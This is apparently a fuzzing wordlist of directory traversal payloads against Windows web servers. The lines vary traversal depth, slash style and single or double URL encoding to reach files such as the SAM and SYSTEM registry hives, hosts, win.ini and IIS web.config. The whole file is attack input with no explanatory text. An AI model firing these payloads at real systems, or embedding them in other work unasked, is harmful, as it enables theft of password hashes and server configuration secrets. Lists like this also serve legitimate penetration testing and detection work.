..%5c..%5c..%5c..%5c..%5cC:%5cWindows%5cSystem32%5cconfig%5cSAM
..%5c..%5c..%5c..%5c..%5cC:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
..%5c..%5c..%5c..%5c..%5cC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
..%5c..%5c..%5c..%5c..%5cC:%5cWindows%5cwin.ini
..%5c..%5c..%5c..%5c..%5cC:%5cinetpub%5cwwwroot%5cweb.config
..%5c..%5c..%5c..%5c..%5cC:\Users\Public\Documents\desktop.ini
..%5c..%5c..%5c..%5c..%5cC:\Windows\System32\config\SAM
..%5c..%5c..%5c..%5c..%5cC:\Windows\System32\config\SYSTEM
..%5c..%5c..%5c..%5c..%5cC:\Windows\System32\drivers\etc\hosts
..%5c..%5c..%5c..%5c..%5cC:\Windows\win.ini
..%5c..%5c..%5c..%5c..%5cC:\inetpub\wwwroot\web.config
..%5c..%5cC:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
..%5c..%5cC:%255cWindows%255cSystem32%255cconfig%255cSAM
..%5c..%5cC:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
..%5c..%5cC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
..%5c..%5cC:%255cWindows%255cwin.ini
..%5c..%5cC:%255cinetpub%255cwwwroot%255cweb.config
..%5c..%5cC:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
..%5c..%5cC:%5cWindows%5cSystem32%5cconfig%5cSAM
..%5c..%5cC:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
..%5c..%5cC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
..%5c..%5cC:%5cWindows%5cwin.ini
..%5c..%5cC:%5cinetpub%5cwwwroot%5cweb.config
..%5c..%5cC:\Users\Public\Documents\desktop.ini
..%5c..%5cC:\Windows\System32\config\SAM
..%5c..%5cC:\Windows\System32\config\SYSTEM
..%5c..%5cC:\Windows\System32\drivers\etc\hosts
..%5c..%5cC:\Windows\win.ini
..%5c..%5cC:\inetpub\wwwroot\web.config
../../../../../../../../C:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
../../../../../../../../C:%255cWindows%255cSystem32%255cconfig%255cSAM
../../../../../../../../C:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
../../../../../../../../C:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
../../../../../../../../C:%255cWindows%255cwin.ini
../../../../../../../../C:%255cinetpub%255cwwwroot%255cweb.config
../../../../../../../../C:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
../../../../../../../../C:%5cWindows%5cSystem32%5cconfig%5cSAM
../../../../../../../../C:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
../../../../../../../../C:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
../../../../../../../../C:%5cWindows%5cwin.ini
../../../../../../../../C:%5cinetpub%5cwwwroot%5cweb.config
../../../../../../../../C:\Users\Public\Documents\desktop.ini
../../../../../../../../C:\Windows\System32\config\SAM
../../../../../../../../C:\Windows\System32\config\SYSTEM
../../../../../../../../C:\Windows\System32\drivers\etc\hosts
../../../../../../../../C:\Windows\win.ini
../../../../../../../../C:\inetpub\wwwroot\web.config
../../../../../C:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
../../../../../C:%255cWindows%255cSystem32%255cconfig%255cSAM
../../../../../C:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
../../../../../C:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
../../../../../C:%255cWindows%255cwin.ini
../../../../../C:%255cinetpub%255cwwwroot%255cweb.config
../../../../../C:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
../../../../../C:%5cWindows%5cSystem32%5cconfig%5cSAM
../../../../../C:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
../../../../../C:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
../../../../../C:%5cWindows%5cwin.ini
../../../../../C:%5cinetpub%5cwwwroot%5cweb.config
../../../../../C:\Users\Public\Documents\desktop.ini
../../../../../C:\Windows\System32\config\SAM
../../../../../C:\Windows\System32\config\SYSTEM
../../../../../C:\Windows\System32\drivers\etc\hosts
../../../../../C:\Windows\win.ini
../../../../../C:\inetpub\wwwroot\web.config
../../C:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
../../C:%255cWindows%255cSystem32%255cconfig%255cSAM
../../C:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
../../C:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
../../C:%255cWindows%255cwin.ini
../../C:%255cinetpub%255cwwwroot%255cweb.config
../../C:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
../../C:%5cWindows%5cSystem32%5cconfig%5cSAM
../../C:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
../../C:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
../../C:%5cWindows%5cwin.ini
../../C:%5cinetpub%5cwwwroot%5cweb.config
../../C:\Users\Public\Documents\desktop.ini
../../C:\Windows\System32\config\SAM
../../C:\Windows\System32\config\SYSTEM
../../C:\Windows\System32\drivers\etc\hosts
../../C:\Windows\win.ini
../../C:\inetpub\wwwroot\web.config
..\..\..\..\..\..\..\..\C:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
..\..\..\..\..\..\..\..\C:%255cWindows%255cSystem32%255cconfig%255cSAM
..\..\..\..\..\..\..\..\C:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
..\..\..\..\..\..\..\..\C:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
..\..\..\..\..\..\..\..\C:%255cWindows%255cwin.ini
..\..\..\..\..\..\..\..\C:%255cinetpub%255cwwwroot%255cweb.config
..\..\..\..\..\..\..\..\C:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
..\..\..\..\..\..\..\..\C:%5cWindows%5cSystem32%5cconfig%5cSAM
..\..\..\..\..\..\..\..\C:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
..\..\..\..\..\..\..\..\C:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
..\..\..\..\..\..\..\..\C:%5cWindows%5cwin.ini
..\..\..\..\..\..\..\..\C:%5cinetpub%5cwwwroot%5cweb.config
..\..\..\..\..\..\..\..\C:\Users\Public\Documents\desktop.ini
..\..\..\..\..\..\..\..\C:\Windows\System32\config\SAM
..\..\..\..\..\..\..\..\C:\Windows\System32\config\SYSTEM
..\..\..\..\..\..\..\..\C:\Windows\System32\drivers\etc\hosts
..\..\..\..\..\..\..\..\C:\Windows\win.ini
..\..\..\..\..\..\..\..\C:\inetpub\wwwroot\web.config
..\..\..\..\..\C:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
..\..\..\..\..\C:%255cWindows%255cSystem32%255cconfig%255cSAM
..\..\..\..\..\C:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
..\..\..\..\..\C:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
..\..\..\..\..\C:%255cWindows%255cwin.ini
..\..\..\..\..\C:%255cinetpub%255cwwwroot%255cweb.config
..\..\..\..\..\C:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
..\..\..\..\..\C:%5cWindows%5cSystem32%5cconfig%5cSAM
..\..\..\..\..\C:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
..\..\..\..\..\C:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
..\..\..\..\..\C:%5cWindows%5cwin.ini
..\..\..\..\..\C:%5cinetpub%5cwwwroot%5cweb.config
..\..\..\..\..\C:\Users\Public\Documents\desktop.ini
..\..\..\..\..\C:\Windows\System32\config\SAM
..\..\..\..\..\C:\Windows\System32\config\SYSTEM
..\..\..\..\..\C:\Windows\System32\drivers\etc\hosts
..\..\..\..\..\C:\Windows\win.ini
..\..\..\..\..\C:\inetpub\wwwroot\web.config
..\..\C:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
..\..\C:%255cWindows%255cSystem32%255cconfig%255cSAM
..\..\C:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
..\..\C:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
..\..\C:%255cWindows%255cwin.ini
..\..\C:%255cinetpub%255cwwwroot%255cweb.config
..\..\C:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
..\..\C:%5cWindows%5cSystem32%5cconfig%5cSAM
..\..\C:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
..\..\C:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
..\..\C:%5cWindows%5cwin.ini
..\..\C:%5cinetpub%5cwwwroot%5cweb.config
..\..\C:\Users\Public\Documents\desktop.ini
..\..\C:\Windows\System32\config\SAM
..\..\C:\Windows\System32\config\SYSTEM
..\..\C:\Windows\System32\drivers\etc\hosts
..\..\C:\Windows\win.ini
..\..\C:\inetpub\wwwroot\web.config
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%255cWindows%255cSystem32%255cconfig%255cSAM
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%255cWindows%255cwin.ini
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%255cinetpub%255cwwwroot%255cweb.config
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%5cWindows%5cSystem32%5cconfig%5cSAM
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%5cWindows%5cwin.ini
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%5cinetpub%5cwwwroot%5cweb.config
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:\Users\Public\Documents\desktop.ini
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:\Windows\System32\config\SAM
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:\Windows\System32\config\SYSTEM
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:\Windows\System32\drivers\etc\hosts
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:\Windows\win.ini
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:\inetpub\wwwroot\web.config
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%255cWindows%255cSystem32%255cconfig%255cSAM
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%255cWindows%255cwin.ini
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%255cinetpub%255cwwwroot%255cweb.config
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%5cWindows%5cSystem32%5cconfig%5cSAM
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%5cWindows%5cwin.ini
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:%5cinetpub%5cwwwroot%5cweb.config
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:\Users\Public\Documents\desktop.ini
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:\Windows\System32\config\SAM
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:\Windows\System32\config\SYSTEM
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:\Windows\System32\drivers\etc\hosts
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:\Windows\win.ini
/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2f/..%2f..%2fC:\inetpub\wwwroot\web.config
/..%2f..%2f/..%2f..%2fC:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
/..%2f..%2f/..%2f..%2fC:%255cWindows%255cSystem32%255cconfig%255cSAM
/..%2f..%2f/..%2f..%2fC:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
/..%2f..%2f/..%2f..%2fC:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
/..%2f..%2f/..%2f..%2fC:%255cWindows%255cwin.ini
/..%2f..%2f/..%2f..%2fC:%255cinetpub%255cwwwroot%255cweb.config
/..%2f..%2f/..%2f..%2fC:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
/..%2f..%2f/..%2f..%2fC:%5cWindows%5cSystem32%5cconfig%5cSAM
/..%2f..%2f/..%2f..%2fC:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
/..%2f..%2f/..%2f..%2fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
/..%2f..%2f/..%2f..%2fC:%5cWindows%5cwin.ini
/..%2f..%2f/..%2f..%2fC:%5cinetpub%5cwwwroot%5cweb.config
/..%2f..%2f/..%2f..%2fC:\Users\Public\Documents\desktop.ini
/..%2f..%2f/..%2f..%2fC:\Windows\System32\config\SAM
/..%2f..%2f/..%2f..%2fC:\Windows\System32\config\SYSTEM
/..%2f..%2f/..%2f..%2fC:\Windows\System32\drivers\etc\hosts
/..%2f..%2f/..%2f..%2fC:\Windows\win.ini
/..%2f..%2f/..%2f..%2fC:\inetpub\wwwroot\web.config
/../..//../..//../..//../..//../..//../..//../..//../../C:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
/../..//../..//../..//../..//../..//../..//../..//../../C:%255cWindows%255cSystem32%255cconfig%255cSAM
/../..//../..//../..//../..//../..//../..//../..//../../C:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
/../..//../..//../..//../..//../..//../..//../..//../../C:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
/../..//../..//../..//../..//../..//../..//../..//../../C:%255cWindows%255cwin.ini
/../..//../..//../..//../..//../..//../..//../..//../../C:%255cinetpub%255cwwwroot%255cweb.config
/../..//../..//../..//../..//../..//../..//../..//../../C:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
/../..//../..//../..//../..//../..//../..//../..//../../C:%5cWindows%5cSystem32%5cconfig%5cSAM
/../..//../..//../..//../..//../..//../..//../..//../../C:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
/../..//../..//../..//../..//../..//../..//../..//../../C:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
/../..//../..//../..//../..//../..//../..//../..//../../C:%5cWindows%5cwin.ini
/../..//../..//../..//../..//../..//../..//../..//../../C:%5cinetpub%5cwwwroot%5cweb.config
/../..//../..//../..//../..//../..//../..//../..//../../C:\Users\Public\Documents\desktop.ini
/../..//../..//../..//../..//../..//../..//../..//../../C:\Windows\System32\config\SAM
/../..//../..//../..//../..//../..//../..//../..//../../C:\Windows\System32\config\SYSTEM
/../..//../..//../..//../..//../..//../..//../..//../../C:\Windows\System32\drivers\etc\hosts
/../..//../..//../..//../..//../..//../..//../..//../../C:\Windows\win.ini
/../..//../..//../..//../..//../..//../..//../..//../../C:\inetpub\wwwroot\web.config
/../..//../..//../..//../..//../../C:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
/../..//../..//../..//../..//../../C:%255cWindows%255cSystem32%255cconfig%255cSAM
/../..//../..//../..//../..//../../C:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
/../..//../..//../..//../..//../../C:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
/../..//../..//../..//../..//../../C:%255cWindows%255cwin.ini
/../..//../..//../..//../..//../../C:%255cinetpub%255cwwwroot%255cweb.config
/../..//../..//../..//../..//../../C:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
/../..//../..//../..//../..//../../C:%5cWindows%5cSystem32%5cconfig%5cSAM
/../..//../..//../..//../..//../../C:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
/../..//../..//../..//../..//../../C:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
/../..//../..//../..//../..//../../C:%5cWindows%5cwin.ini
/../..//../..//../..//../..//../../C:%5cinetpub%5cwwwroot%5cweb.config
/../..//../..//../..//../..//../../C:\Users\Public\Documents\desktop.ini
/../..//../..//../..//../..//../../C:\Windows\System32\config\SAM
/../..//../..//../..//../..//../../C:\Windows\System32\config\SYSTEM
/../..//../..//../..//../..//../../C:\Windows\System32\drivers\etc\hosts
/../..//../..//../..//../..//../../C:\Windows\win.ini
/../..//../..//../..//../..//../../C:\inetpub\wwwroot\web.config
/../..//../../C:%255cUsers%255cPublic%255cDocuments%255cdesktop.ini
/../..//../../C:%255cWindows%255cSystem32%255cconfig%255cSAM
/../..//../../C:%255cWindows%255cSystem32%255cconfig%255cSYSTEM
/../..//../../C:%255cWindows%255cSystem32%255cdrivers%255cetc%255chosts
/../..//../../C:%255cWindows%255cwin.ini
/../..//../../C:%255cinetpub%255cwwwroot%255cweb.config
/../..//../../C:%5cUsers%5cPublic%5cDocuments%5cdesktop.ini
/../..//../../C:%5cWindows%5cSystem32%5cconfig%5cSAM
/../..//../../C:%5cWindows%5cSystem32%5cconfig%5cSYSTEM
/../..//../../C:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts
/../..//../../C:%5cWindows%5cwin.ini
/../..//../../C:%5cinetpub%5cwwwroot%5cweb.config
/../..//../../C:\Users\Public\Documents\desktop.ini
/../..//../../C:\Windows\System32\config\SAM
/../..//../../C:\Windows\System32\config\SYSTEM
/../..//../../C:\Windows\System32\drivers\etc\hosts
/../..//../../C:\Windows\win.ini
/../..//../../C:\inetpub\wwwroot\web.config
